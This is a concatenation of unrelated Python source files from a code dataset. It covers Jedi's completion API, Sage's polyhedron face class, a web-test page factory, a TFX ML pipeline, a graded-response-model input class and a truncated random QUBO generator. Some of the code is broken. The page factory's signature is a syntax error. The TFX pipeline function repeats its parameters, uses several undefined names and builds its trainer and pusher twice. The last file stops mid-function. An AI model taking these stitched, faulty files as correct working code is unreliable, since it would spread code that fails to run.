names that point to the definition of the name under the cursor. This
is very useful for refactoring (renaming), or to show all usages of a
variable.
.. todo:: Implement additional_module_paths
:param additional_module_paths: Deprecated, never ever worked.
:param include_builtins: Default True, checks if a usage is a builtin
(e.g. ``sys``) and in that case does not return it.
:rtype: list of :class:`classes.Definition`
"""
if additional_module_paths:
warnings.warn(
"Deprecated since version 0.12.0. This never even worked, just ignore it.",
DeprecationWarning,
stacklevel=2
)
def _usages(include_builtins=True):
tree_name = self._module_node.get_name_of_position(self._pos)
if tree_name is None:
# Must be syntax
return []
names = usages.usages(self._get_module(), tree_name)
definitions = [classes.Definition(self._evaluator, n) for n in names]
if not include_builtins:
definitions = [d for d in definitions if not d.in_builtin_module()]
return helpers.sorted_definitions(definitions)
return _usages(**kwargs)
def call_signatures(self):
"""
Return the function object of the call you're currently in.
E.g. if the cursor is here::
abs(# <-- cursor is here
This would return the ``abs`` function. On the other hand::
abs()# <-- cursor is here
This would return an empty list..
:rtype: list of :class:`classes.CallSignature`
"""
call_signature_details = \
helpers.get_call_signature_details(self._module_node, self._pos)
if call_signature_details is None:
return []
context = self._evaluator.create_context(
self._get_module(),
call_signature_details.bracket_leaf
)
definitions = helpers.cache_call_signatures(
self._evaluator,
context,
call_signature_details.bracket_leaf,
self._code_lines,
self._pos
)
debug.speed('func_call followed')
return [classes.CallSignature(self._evaluator, d.name,
call_signature_details.bracket_leaf.start_pos,
call_signature_details.call_index,
call_signature_details.keyword_name_str)
for d in definitions if hasattr(d, 'py__call__')]
def _analysis(self):
self._evaluator.is_analysis = True
self._evaluator.analysis_modules = [self._module_node]
module = self._get_module()
try:
for node in get_executable_nodes(self._module_node):
context = module.create_context(node)
if node.type in ('funcdef', 'classdef'):
# Resolve the decorators.
tree_name_to_contexts(self._evaluator, context, node.children[1])
elif isinstance(node, tree.Import):
import_names = set(node.get_defined_names())
if node.is_nested():
import_names |= set(path[-1] for path in node.get_paths())
for n in import_names:
imports.infer_import(context, n)
elif node.type == 'expr_stmt':
types = context.eval_node(node)
for testlist in node.children[:-1:2]:
# Iterate tuples.
unpack_tuple_to_dict(context, types, testlist)
else:
if node.type == 'name':
defs = self._evaluator.goto_definitions(context, node)
else:
defs = evaluate_call_of_leaf(context, node)
try_iter_content(defs)
self._evaluator.reset_recursion_limitations()
ana = [a for a in self._evaluator.analysis if self.path == a.path]
return sorted(set(ana), key=lambda x: x.line)
finally:
self._evaluator.is_analysis = False
class Interpreter(Script):
"""
Jedi API for Python REPLs.
In addition to completion of simple attribute access, Jedi
supports code completion based on static code analysis.
Jedi can complete attributes of object which is not initialized
yet.
>>> from os.path import join
>>> namespace = locals()
>>> script = Interpreter('join("").up', [namespace])
>>> print(script.completions()[0].name)
upper
"""
def __init__(self, source, namespaces, **kwds):
"""
Parse `source` and mixin interpreted Python objects from `namespaces`.
:type source: str
:arg source: Code to parse.
:type namespaces: list of dict
:arg namespaces: a list of namespace dictionaries such as the one
returned by :func:`locals`.
Other optional arguments are same as the ones for :class:`Script`.
If `line` and `column` are None, they are assumed be at the end of
`source`.
"""
try:
namespaces = [dict(n) for n in namespaces]
except Exception:
raise TypeError("namespaces must be a non-empty list of dicts.")
environment = kwds.get('environment', None)
if environment is None:
environment = InterpreterEnvironment()
else:
if not isinstance(environment, InterpreterEnvironment):
raise TypeError("The environment needs to be an InterpreterEnvironment subclass.")
super(Interpreter, self).__init__(source, environment=environment, **kwds)
self.namespaces = namespaces
def _get_module(self):
return interpreter.MixedModuleContext(
self._evaluator,
self._module_node,
self.namespaces,
path=self.path,
code_lines=self._code_lines,
)
def names(source=None, path=None, encoding='utf-8', all_scopes=False,
definitions=True, references=False, environment=None):
"""
Returns a list of `Definition` objects, containing name parts.
This means you can call ``Definition.goto_assignments()`` and get the
reference of a name.
The parameters are the same as in :py:class:`Script`, except or the
following ones:
:param all_scopes: If True lists the names of all scopes instead of only
the module namespace.
:param definitions: If True lists the names that have been defined by a
class, function or a statement (``a = b`` returns ``a``).
:param references: If True lists all the names that are not listed by
``definitions=True``. E.g. ``a = b`` returns ``b``.
"""
def def_ref_filter(_def):
is_def = _def._name.tree_name.is_definition()
return definitions and is_def or references and not is_def
def create_name(name):
if name.parent.type == 'param':
cls = ParamName
else:
cls = TreeNameDefinition
is_module = name.parent.type == 'file_input'
return cls(
module_context.create_context(name if is_module else name.parent),
name
)
# Set line/column to a random position, because they don't matter.
script = Script(source, line=1, column=0, path=path, encoding=encoding, environment=environment)
module_context = script._get_module()
defs = [
classes.Definition(
script._evaluator,
create_name(name)
) for name in get_module_names(script._module_node, all_scopes)
]
return sorted(filter(def_ref_filter, defs), key=lambda x: (x.line, x.column))
def preload_module(*modules):
"""
Preloading modules tells Jedi to load a module now, instead of lazy parsing
of modules. Usful for IDEs, to control which modules to load on startup.
:param modules: different module names, list of string.
"""
for m in modules:
s = "import %s as x; x." % m
Script(s, 1, len(s), None).completions()
def set_debug_function(func_cb=debug.print_to_stdout, warnings=True,
notices=True, speed=True):
"""
Define a callback debug function to get all the debug messages.
If you don't specify any arguments, debug messages will be printed to stdout.
:param func_cb: The callback function for debug messages, with n params.
"""
debug.debug_function = func_cb
debug.enable_warning = warnings
debug.enable_notice = notices
debug.enable_speed = speed
| StarcoderdataPython |
1671766 | <filename>src/sage/geometry/polyhedron/face.py
"""
A class to keep information about faces of a polyhedron
This module gives you a tool to work with the faces of a polyhedron
and their relative position. First, you need to find the faces. To get
the faces in a particular dimension, use the
:meth:`~sage.geometry.polyhedron.base.face` method::
sage: P = polytopes.cross_polytope(3)
sage: P.faces(3)
(A 3-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 6 vertices,)
sage: [f.ambient_V_indices() for f in P.faces(2)]
[(0, 1, 2),
(0, 1, 3),
(0, 2, 4),
(0, 3, 4),
(3, 4, 5),
(2, 4, 5),
(1, 3, 5),
(1, 2, 5)]
sage: [f.ambient_V_indices() for f in P.faces(1)]
[(0, 1),
(0, 2),
(1, 2),
(0, 3),
(1, 3),
(0, 4),
(2, 4),
(3, 4),
(2, 5),
(3, 5),
(4, 5),
(1, 5)]
or :meth:`~sage.geometry.polyhedron.base.face_lattice` to get the
whole face lattice as a poset::
sage: P.face_lattice()
Finite lattice containing 28 elements with distinguished linear extension
The faces are printed in shorthand notation where each integer is the
index of a vertex/ray/line in the same order as the containing
Polyhedron's :meth:`~sage.geometry.polyhedron.base.Vrepresentation` ::
sage: face = P.faces(1)[3]; face
A 1-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 2 vertices
sage: face.ambient_V_indices()
(0, 3)
sage: P.Vrepresentation(0)
A vertex at (-1, 0, 0)
sage: P.Vrepresentation(3)
A vertex at (0, 0, 1)
sage: face.vertices()
(A vertex at (-1, 0, 0), A vertex at (0, 0, 1))
The face itself is not represented by Sage's
:func:`sage.geometry.polyhedron.constructor.Polyhedron` class, but by
an auxiliary class to keep the information. You can get the face as a
polyhedron with the :meth:`PolyhedronFace.as_polyhedron` method::
sage: face.as_polyhedron()
A 1-dimensional polyhedron in ZZ^3 defined as the convex hull of 2 vertices
sage: _.equations()
(An equation (0, 1, 0) x + 0 == 0,
An equation (1, 0, -1) x + 1 == 0)
"""
########################################################################
# Copyright (C) 2012 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# http://www.gnu.org/licenses/
########################################################################
from __future__ import print_function
from sage.structure.sage_object import SageObject
from sage.structure.richcmp import richcmp_method, richcmp
from sage.misc.all import cached_method
from sage.modules.free_module_element import vector
from sage.matrix.constructor import matrix
#########################################################################
@richcmp_method
class PolyhedronFace(SageObject):
r"""
A face of a polyhedron.
This class is for use in
:meth:`~sage.geometry.polyhedron.base.Polyhedron_base.face_lattice`.
INPUT:
No checking is performed whether the H/V-representation indices
actually determine a face of the polyhedron. You should not
manually create :class:`PolyhedronFace` objects unless you know
what you are doing.
OUTPUT:
A :class:`PolyhedronFace`.
EXAMPLES::
sage: octahedron = polytopes.cross_polytope(3)
sage: inequality = octahedron.Hrepresentation(2)
sage: face_h = tuple([ inequality ])
sage: face_v = tuple( inequality.incident() )
sage: face_h_indices = [ h.index() for h in face_h ]
sage: face_v_indices = [ v.index() for v in face_v ]
sage: from sage.geometry.polyhedron.face import PolyhedronFace
sage: face = PolyhedronFace(octahedron, face_v_indices, face_h_indices)
sage: face
A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 3 vertices
sage: face.dim()
2
sage: face.ambient_V_indices()
(0, 1, 2)
sage: face.ambient_Hrepresentation()
(An inequality (1, 1, 1) x + 1 >= 0,)
sage: face.ambient_Vrepresentation()
(A vertex at (-1, 0, 0), A vertex at (0, -1, 0), A vertex at (0, 0, -1))
"""
def __init__(self, polyhedron, V_indices, H_indices):
r"""
The constructor.
See :class:`PolyhedronFace` for more information.
INPUT:
- ``polyhedron`` -- a :class:`Polyhedron`. The ambient
polyhedron.
- ``V_indices`` -- list of sorted integers. The indices of the
face-spanning V-representation objects in the ambient
polyhedron.
- ``H_indices`` -- list of sorted integers. The indices of the
H-representation objects of the ambient polyhedron that are
saturated on the face.
TESTS::
sage: from sage.geometry.polyhedron.face import PolyhedronFace
sage: PolyhedronFace(Polyhedron(), [], []) # indirect doctest
A -1-dimensional face of a Polyhedron in ZZ^0
"""
self._polyhedron = polyhedron
self._ambient_Vrepresentation_indices = tuple(V_indices)
self._ambient_Hrepresentation_indices = tuple(H_indices)
self._ambient_Vrepresentation = tuple( polyhedron.Vrepresentation(i) for i in V_indices )
self._ambient_Hrepresentation = tuple( polyhedron.Hrepresentation(i) for i in H_indices )
def __hash__(self):
r"""
TESTS::
sage: P = Polyhedron([[0,0],[0,1],[23,3],[9,12]])
sage: list(map(hash, P.faces(1))) # random
[2377119663630407734,
2377136578164722109,
5966674064902575359,
4795242501625591634]
"""
return hash((self._polyhedron, self._ambient_Vrepresentation_indices))
def vertex_generator(self):
"""
Return a generator for the vertices of the face.
EXAMPLES::
sage: triangle = Polyhedron(vertices=[[1,0],[0,1],[1,1]])
sage: face = triangle.faces(1)[0]
sage: for v in face.vertex_generator(): print(v)
A vertex at (0, 1)
A vertex at (1, 0)
sage: type(face.vertex_generator())
<... 'generator'>
"""
for V in self.ambient_Vrepresentation():
if V.is_vertex():
yield V
@cached_method
def vertices(self):
"""
Return all vertices of the face.
OUTPUT:
A tuple of vertices.
EXAMPLES::
sage: triangle = Polyhedron(vertices=[[1,0],[0,1],[1,1]])
sage: face = triangle.faces(1)[0]
sage: face.vertices()
(A vertex at (0, 1), A vertex at (1, 0))
"""
return tuple(self.vertex_generator())
@cached_method
def n_vertices(self):
"""
Return the number of vertices of the face.
OUTPUT:
Integer.
EXAMPLES::
sage: Q = polytopes.cross_polytope(3)
sage: face = Q.faces(2)[0]
sage: face.n_vertices()
3
"""
return len(self.vertices())
def ray_generator(self):
"""
Return a generator for the rays of the face.
EXAMPLES::
sage: pi = Polyhedron(ieqs = [[1,1,0],[1,0,1]])
sage: face = pi.faces(1)[0]
sage: next(face.ray_generator())
A ray in the direction (1, 0)
"""
for V in self.ambient_Vrepresentation():
if V.is_ray():
yield V
@cached_method
def rays(self):
"""
Return the rays of the face.
OUTPUT:
A tuple of rays.
EXAMPLES::
sage: p = Polyhedron(ieqs = [[0,0,0,1],[0,0,1,0],[1,1,0,0]])
sage: face = p.faces(2)[0]
sage: face.rays()
(A ray in the direction (1, 0, 0), A ray in the direction (0, 1, 0))
"""
return tuple(self.ray_generator())
@cached_method
def n_rays(self):
"""
Return the number of rays of the face.
OUTPUT:
Integer.
EXAMPLES::
sage: p = Polyhedron(ieqs = [[0,0,0,1],[0,0,1,0],[1,1,0,0]])
sage: face = p.faces(2)[0]
sage: face.n_rays()
2
"""
return len(self.rays())
def line_generator(self):
"""
Return a generator for the lines of the face.
EXAMPLES::
sage: pr = Polyhedron(rays = [[1,0],[-1,0],[0,1]], vertices = [[-1,-1]])
sage: face = pr.faces(1)[0]
sage: next(face.line_generator())
A line in the direction (1, 0)
"""
for V in self.ambient_Vrepresentation():
if V.is_line():
yield V
@cached_method
def lines(self):
"""
Return all lines of the face.
OUTPUT:
A tuple of lines.
EXAMPLES::
sage: p = Polyhedron(rays = [[1,0],[-1,0],[0,1],[1,1]], vertices = [[-2,-2],[2,3]])
sage: p.lines()
(A line in the direction (1, 0),)
"""
return tuple(self.line_generator())
@cached_method
def n_lines(self):
"""
Return the number of lines of the face.
OUTPUT:
Integer.
EXAMPLES::
sage: p = Polyhedron(rays = [[1,0],[-1,0],[0,1],[1,1]], vertices = [[-2,-2],[2,3]])
sage: p.n_lines()
1
"""
return len(self.lines())
def __richcmp__(self, other, op):
"""
Compare ``self`` and ``other``.
INPUT:
- ``other`` -- anything.
OUTPUT:
Two faces test equal if and only if they are faces of the same
(not just isomorphic) polyhedron and their generators have the
same indices.
EXAMPLES::
sage: square = polytopes.hypercube(2)
sage: f = square.faces(1)
sage: matrix(4,4, lambda i,j: ZZ(f[i] <= f[j]))
[1 1 1 1]
[0 1 1 1]
[0 0 1 1]
[0 0 0 1]
sage: matrix(4,4, lambda i,j: ZZ(f[i] == f[j])) == 1
True
"""
if not isinstance(other, PolyhedronFace):
return NotImplemented
if self._polyhedron is not other._polyhedron:
return NotImplemented
return richcmp(self._ambient_Vrepresentation_indices,
other._ambient_Vrepresentation_indices, op)
def ambient_Hrepresentation(self, index=None):
r"""
Return the H-representation objects of the ambient polytope
defining the face.
INPUT:
- ``index`` -- optional. Either an integer or ``None``
(default).
OUTPUT:
If the optional argument is not present, a tuple of
H-representation objects. Each entry is either an inequality
or an equation.
If the optional integer ``index`` is specified, the
``index``-th element of the tuple is returned.
EXAMPLES::
sage: square = polytopes.hypercube(2)
sage: for face in square.face_lattice():
....: print(face.ambient_Hrepresentation())
(An inequality (1, 0) x + 1 >= 0, An inequality (0, 1) x + 1 >= 0,
An inequality (-1, 0) x + 1 >= 0, An inequality (0, -1) x + 1 >= 0)
(An inequality (1, 0) x + 1 >= 0, An inequality (0, 1) x + 1 >= 0)
(An inequality (1, 0) x + 1 >= 0, An inequality (0, -1) x + 1 >= 0)
(An inequality (0, 1) x + 1 >= 0, An inequality (-1, 0) x + 1 >= 0)
(An inequality (-1, 0) x + 1 >= 0, An inequality (0, -1) x + 1 >= 0)
(An inequality (1, 0) x + 1 >= 0,)
(An inequality (0, 1) x + 1 >= 0,)
(An inequality (-1, 0) x + 1 >= 0,)
(An inequality (0, -1) x + 1 >= 0,)
()
"""
if index is None:
return self._ambient_Hrepresentation
else:
return self._ambient_Hrepresentation[index]
def ambient_Vrepresentation(self, index=None):
r"""
Return the V-representation objects of the ambient polytope
defining the face.
INPUT:
- ``index`` -- optional. Either an integer or ``None``
(default).
OUTPUT:
If the optional argument is not present, a tuple of
V-representation objects. Each entry is either a vertex, a
ray, or a line.
If the optional integer ``index`` is specified, the
``index``-th element of the tuple is returned.
EXAMPLES::
sage: square = polytopes.hypercube(2)
sage: for fl in square.face_lattice():
....: print(fl.ambient_Vrepresentation())
()
(A vertex at (-1, -1),)
(A vertex at (-1, 1),)
(A vertex at (1, -1),)
(A vertex at (1, 1),)
(A vertex at (-1, -1), A vertex at (-1, 1))
(A vertex at (-1, -1), A vertex at (1, -1))
(A vertex at (1, -1), A vertex at (1, 1))
(A vertex at (-1, 1), A vertex at (1, 1))
(A vertex at (-1, -1), A vertex at (-1, 1),
A vertex at (1, -1), A vertex at (1, 1))
"""
if index is None:
return self._ambient_Vrepresentation
else:
return self._ambient_Vrepresentation[index]
def n_ambient_Hrepresentation(self):
"""
Return the number of objects that make up the ambient
H-representation of the polyhedron.
See also :meth:`ambient_Hrepresentation`.
OUTPUT:
Integer.
EXAMPLES::
sage: p = polytopes.cross_polytope(4)
sage: face = p.face_lattice()[10]
sage: face
A 1-dimensional face of a Polyhedron in ZZ^4 defined as the convex hull of 2 vertices
sage: face.ambient_Hrepresentation()
(An inequality (1, -1, 1, -1) x + 1 >= 0,
An inequality (1, 1, 1, 1) x + 1 >= 0,
An inequality (1, 1, 1, -1) x + 1 >= 0,
An inequality (1, -1, 1, 1) x + 1 >= 0)
sage: face.n_ambient_Hrepresentation()
4
"""
return len(self.ambient_Hrepresentation())
def n_ambient_Vrepresentation(self):
"""
Return the number of objects that make up the ambient
V-representation of the polyhedron.
See also :meth:`ambient_Vrepresentation`.
OUTPUT:
Integer.
EXAMPLES::
sage: p = polytopes.cross_polytope(4)
sage: face = p.face_lattice()[10]
sage: face
A 1-dimensional face of a Polyhedron in ZZ^4 defined as the convex hull of 2 vertices
sage: face.ambient_Vrepresentation()
(A vertex at (-1, 0, 0, 0), A vertex at (0, 0, -1, 0))
sage: face.n_ambient_Vrepresentation()
2
"""
return len(self.ambient_Vrepresentation())
def ambient_H_indices(self):
"""
Return the indices of the H-representation objects of the
ambient polyhedron that make up the H-representation of ``self``.
See also :meth:`ambient_Hrepresentation`.
OUTPUT:
Tuple of indices
EXAMPLES::
sage: Q = polytopes.cross_polytope(3)
sage: F = Q.faces(1)
sage: [f.ambient_H_indices() for f in F]
[(1, 2),
(2, 3),
(2, 7),
(0, 1),
(1, 6),
(0, 3),
(3, 4),
(0, 5),
(4, 7),
(5, 6),
(4, 5),
(6, 7)]
"""
return self._ambient_Hrepresentation_indices
def ambient_V_indices(self):
"""
Return the indices of the V-representation objects of the
ambient polyhedron that make up the V-representation of ``self``.
See also :meth:`ambient_Vrepresentation`.
OUTPUT:
Tuple of indices
EXAMPLES::
sage: P = polytopes.cube()
sage: F = P.faces(2)
sage: [f.ambient_V_indices() for f in F]
[(0, 1, 2, 3),
(0, 1, 4, 5),
(0, 2, 4, 6),
(1, 3, 5, 7),
(2, 3, 6, 7),
(4, 5, 6, 7)]
"""
return self._ambient_Vrepresentation_indices
def ambient_dim(self):
r"""
Return the dimension of the containing polyhedron.
EXAMPLES::
sage: P = Polyhedron(vertices = [[1,0,0,0],[0,1,0,0]])
sage: face = P.faces(1)[0]
sage: face.ambient_dim()
4
"""
return self._polyhedron.ambient_dim()
@cached_method
def dim(self):
"""
Return the dimension of the face.
OUTPUT:
Integer.
EXAMPLES::
sage: fl = polytopes.dodecahedron().face_lattice()
sage: [ x.dim() for x in fl ]
[-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3]
"""
if self.n_ambient_Vrepresentation() == 0:
return -1
else:
origin = vector(self.ambient_Vrepresentation(0))
v_list = [ vector(v)-origin for v in self.ambient_Vrepresentation() ]
return matrix(v_list).rank()
def _repr_(self):
r"""
Return a string representation.
OUTPUT:
A string listing the V-representation indices of the face.
EXAMPLES::
sage: square = polytopes.hypercube(2)
sage: a_face = list( square.face_lattice() )[8]
sage: a_face.__repr__()
'A 1-dimensional face of a Polyhedron in ZZ^2 defined as the convex hull of 2 vertices'
"""
desc = ''
desc += 'A ' + repr(self.dim()) + '-dimensional face'
desc += ' of a Polyhedron in '
desc += self.polyhedron().parent()._repr_ambient_module()
if self.n_vertices() > 0:
desc += ' defined as the convex hull of '
desc += repr(self.n_vertices())
if self.n_vertices() == 1: desc += ' vertex'
else: desc += ' vertices'
if self.n_rays() > 0:
if self.n_lines() > 0: desc += ", "
else: desc += " and "
desc += repr(self.n_rays())
if self.n_rays() == 1: desc += ' ray'
else: desc += ' rays'
if self.n_lines() > 0:
if self.n_rays() > 0: desc += ", "
else: desc += " and "
desc += repr(self.n_lines())
if self.n_lines() == 1: desc += ' line'
else: desc += ' lines'
return desc
def polyhedron(self):
"""
Return the containing polyhedron.
EXAMPLES::
sage: P = polytopes.cross_polytope(3); P
A 3-dimensional polyhedron in ZZ^3 defined as the convex hull of 6 vertices
sage: face = P.faces(2)[3]
sage: face
A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 3 vertices
sage: face.polyhedron()
A 3-dimensional polyhedron in ZZ^3 defined as the convex hull of 6 vertices
"""
return self._polyhedron
@cached_method
def as_polyhedron(self):
"""
Return the face as an independent polyhedron.
OUTPUT:
A polyhedron.
EXAMPLES::
sage: P = polytopes.cross_polytope(3); P
A 3-dimensional polyhedron in ZZ^3 defined as the convex hull of 6 vertices
sage: face = P.faces(2)[3]
sage: face
A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 3 vertices
sage: face.as_polyhedron()
A 2-dimensional polyhedron in ZZ^3 defined as the convex hull of 3 vertices
sage: P.intersection(face.as_polyhedron()) == face.as_polyhedron()
True
"""
P = self._polyhedron
parent = P.parent()
Vrep = (self.vertices(), self.rays(), self.lines())
return P.__class__(parent, Vrep, None)
| StarcoderdataPython |
3384308 | """
PageFactory uses the factory design pattern.
get_page_object() returns the appropriate page object.
Add elif clauses as and when you implement new pages.
Pages implemented so far:
1. Temperature main page
2. Moisturizer page
3. Sunscreens Page
4. Cart Page
5. Payment Gateway Page
"""
from page_objects.temperature_main_page import Temperature_Main_Page
from page_objects.temperature_moisturizer_redirect_page import Temperature_Moisturizer_Redirect_Page
from page_objects.temperature_sunscreen_redirect_page import Temperature_Sunscreen_Redirect_Page
class PageFactory():
"PageFactory uses the factory design pattern."
def get_page_object(base_url='http://weathershopper.pythonanywhere.com/',trailing_slash_flag=True,page_name):
"Return the appropriate page object based on page_name"
test_obj = None
page_name = page_name.lower()
if page_name == "main page":
test_obj = Temperature_Main_Page(base_url=base_url,trailing_slash_flag=trailing_slash_flag)
elif page_name == "moisturizers":
test_obj = Temperature_Moisturizer_Redirect_Page(base_url=base_url,trailing_slash_flag=trailing_slash_flag)
elif page_name == "sunscreens":
test_obj = Temperature_Sunscreen_Redirect_Page(base_url=base_url,trailing_slash_flag=trailing_slash_flag)
return test_obj
get_page_object = staticmethod(get_page_object) | StarcoderdataPython |
3234077 | <gh_stars>1-10
################################################################################################################
#
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################################################
from typing import Any, Dict, List, Optional
import tensorflow_model_analysis as tfma
from tfx import v1 as tfx
from ml_metadata.proto import metadata_store_pb2
def create_pipeline(
pipeline_name: str,
pipeline_root: str,
data_path: str,
preprocessing_fn: str,
run_fn: str,
train_steps: tfx.proto.TrainArgs,
eval_steps: tfx.proto.EvalArgs,
train_steps,
eval_steps,
serving_model_dir
):
'''
Returns:
A TFX pipeline object.
'''
components = []
## Brings data into the pipeline or otherwise joins/converts training data.
example_gen = tfx.components.CsvExampleGen(input_base=data_path)
components.append(example_gen)
## Computes Statistics for Validation
statistics_gen = tfx.components.StatisticsGen(
examples=example_gen.outputs['examples']
)
## Performs anomaly detection based on statistics and data schema.
if schema_path is None:
schema_gen = tfx.components.SchemaGen(
statistics=statistics_gen.outputs['statistics'])
components.append(schema_gen)
else:
schema_gen = tfx.components.ImportSchemaGen(schema_file=schema_path)
components.append(schema_gen)
## Performs anomaly detection based on statistics and data schema.
example_validator = tfx.components.ExampleValidator(statistics=statistics_gen.outputs['statistics'],
schema=schema_gen.outputs['schema'])
components.append(example_validator)
## Performs Transforms
transform = tfx.components.Transform(
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
preprocessing_fn=preprocessing_fn)
components.append(transform)
## Trainer Component
trainer = tfx.components.Trainer(
module_file=os.path.abspath(train_path),
#custom_executor_spec=executor_spec.ExecutorClassSpec(GenericExecutor),
examples=transform.outputs['transformed_examples'],
transform_graph=transform.outputs['transform_graph'],
schema=schema_gen.outputs['schema'],
train_steps=train_steps,
eval_steps=eval_steps
)
# Uses user-provided Python function that implements a model.
trainer_args = {
'run_fn': run_fn,
'examples': transform.outputs['transformed_examples'],
'schema': schema_gen.outputs['schema'],
'transform_graph': transform.outputs['transform_graph'],
'train_args': train_args,
'eval_args': eval_args,
}
if ai_platform_training_args is not None:
trainer_args['custom_config'] = {
tfx.extensions.google_cloud_ai_platform.TRAINING_ARGS_KEY:
ai_platform_training_args,
}
trainer = tfx.extensions.google_cloud_ai_platform.Trainer(**trainer_args)
else:
trainer = tfx.components.Trainer(**trainer_args)
components.append(trainer)
## Resolver Component
model_resolver = tfx.dsl.Resolver(
strategy_class=tfx.dsl.experimental.LatestBlessedModelStrategy,
model=tfx.dsl.Channel(type=tfx.types.standard_artifacts.Model),
model_blessing=tfx.dsl.Channel(
type=tfx.types.standard_artifacts.ModelBlessing)).with_id(
'latest_blessed_model_resolver')
components.append(model_resolver)
## Evaluator
eval_config = tfma.EvalConfig(
model_specs=[
tfma.ModelSpec(label_key='target',
signature_name='serving_default',
preprocessing_function_names=['transform_features'])
],
metrics_specs=[
tfma.MetricsSpec(
metrics=[
tfma.MetricConfig(class_name='ExampleCount')
],
thresholds = {
'accuracy': tfma.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': 0.5}),
change_threshold=tfma.GenericChangeThreshold( direction=tfma.MetricDirection.HIGHER_IS_BETTER, absolute={'value': -1e-10}))
}
)
],
slicing_specs=[tfma.SlicingSpec(),]
)
## Evaluator Componant
evaluator = tfx.components.Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
baseline_model=model_resolver.outputs['model'],
eval_config=eval_config
)
components.append(evaluator)
# Checks whether the model passed the validation steps and pushes the model
# to a file destination if check passed.
pusher_args = {
'model':
trainer.outputs['model'],
'model_blessing':
evaluator.outputs['blessing'],
}
if ai_platform_serving_args is not None:
pusher_args['custom_config'] = {
tfx.extensions.google_cloud_ai_platform.experimental
.PUSHER_SERVING_ARGS_KEY:
ai_platform_serving_args
}
pusher = tfx.extensions.google_cloud_ai_platform.Pusher(**pusher_args) # pylint: disable=unused-variable
else:
pusher_args['push_destination'] = tfx.proto.PushDestination(
filesystem=tfx.proto.PushDestination.Filesystem(
base_directory=serving_model_dir))
pusher = tfx.components.Pusher(**pusher_args) # pylint: disable=unused-variable
# TODO(step 6): Uncomment here to add Pusher to the pipeline.
# components.append(pusher)
## TODO: Update Serving Model Directory
## Pusher - Export for Model Serving
pusher = tfx.components.Pusher(
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=tfx.proto.PushDestination(
filesystem=tfx.proto.PushDestination.Filesystem(
base_directory=serving_model_dir)))
## TODO: Change Pipeline Name / Root Enviroment Variables
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=components
)
| StarcoderdataPython |
3252750 | from dataclasses import dataclass
from typing import Optional
import numpy as np
import pandas as pd
from .meta import GRMMeta
@dataclass()
class GRMInputs:
meta: GRMMeta
response_array: np.ndarray
level_array: Optional[np.ndarray] = None
@classmethod
def from_df(cls,
response_df: pd.DataFrame,
level_df: pd.DataFrame = None):
"""
:param response_df: columns=["item", "person", "response"]
:param level_df: columns=["item", "level"]
"""
ret = cls._from_response_df(response_df)
if level_df is not None:
ret._add_level(level_df)
return ret
@classmethod
def _from_response_df(cls, response_df: pd.DataFrame):
assert "item" in response_df.columns
assert "person" in response_df.columns
assert "response" in response_df.columns
assert np.issubdtype(response_df.response.dtype, np.integer)
assert response_df.response.min() >= 1
response_df = response_df.astype({"item": "category", "person": "category"})
meta = GRMMeta(
response_df.item.dtype,
response_df.person.dtype,
response_df.response.max()
)
response_array = np.c_[
response_df.item.cat.codes.values,
response_df.person.cat.codes.values,
response_df.response.values
]
return GRMInputs(meta, response_array)
def _add_level(self, level_df: pd.DataFrame):
assert "item" in level_df.columns
assert "level" in level_df.columns
assert level_df.item.unique().all()
level_df = pd.merge(
self.meta.item_category.categories.to_frame(name="item"),
level_df
.drop_duplicates(subset="item")
.astype({"item": self.meta.item_category}),
how="left"
)
level_df["level"] = level_df.level.fillna("_unknown").astype({"level": "category"})
self.meta.level_category = level_df.level.dtype
self.level_array = level_df.level.cat.codes.values
| StarcoderdataPython |
3326413 | <reponame>mullzhang/genqubo
import numpy as np
import numpy.random
from dimod.binary_quadratic_model import BinaryQuadraticModel
from dimod.decorators import graph_argument
@graph_argument('graph')
def normal(graph, vartype, loc=0.0, scale=1.0, cls=BinaryQuadraticModel,
seed=None, zero_lbias=False):
"""Generate a bqm with random biases and offset.
Biases and offset are drawn from a normal distribution range (mean, std).
Args:
graph (int/tuple[nodes, edges]/list[edge]/:obj:`~networkx.Graph`):
The graph to build the bqm on. Either an integer n,
interpreted as a complete graph of size n, a nodes/edges pair,
a list of edges or a NetworkX graph.
vartype (:class:`.Vartype`/str/set):
Variable type for the binary quadratic model. Accepted input values:
* :class:`.Vartype.SPIN`, ``'SPIN'``, ``{-1, 1}``
* :class:`.Vartype.BINARY`, ``'BINARY'``, ``{0, 1}``
loc (float, optional, default=0.0):
Mean (“centre”) of the distribution for the random biases.
scale (float, optional, default=1.0):
Standard deviation (spread or “width”) of the distribution
for the random biases. Must be non-negative.
cls (:class:`.BinaryQuadraticModel`):
Binary quadratic model class to build from.
seed (int, optional, default=None):
Random seed.
zero_lbias (bool, optional, default=False):
If true, linear biases will set zero.
Returns:
:obj:`.BinaryQuadraticModel`
"""
if seed is None:
seed = numpy.random.randint(2**32, dtype=np.uint32)
r = numpy.random.RandomState(seed)
variables, edges = graph
index = {v: idx for idx, v in enumerate(variables)}
if edges:
irow, icol = zip(*((index[u], index[v]) for u, v in edges))
else:
irow = icol = tuple()
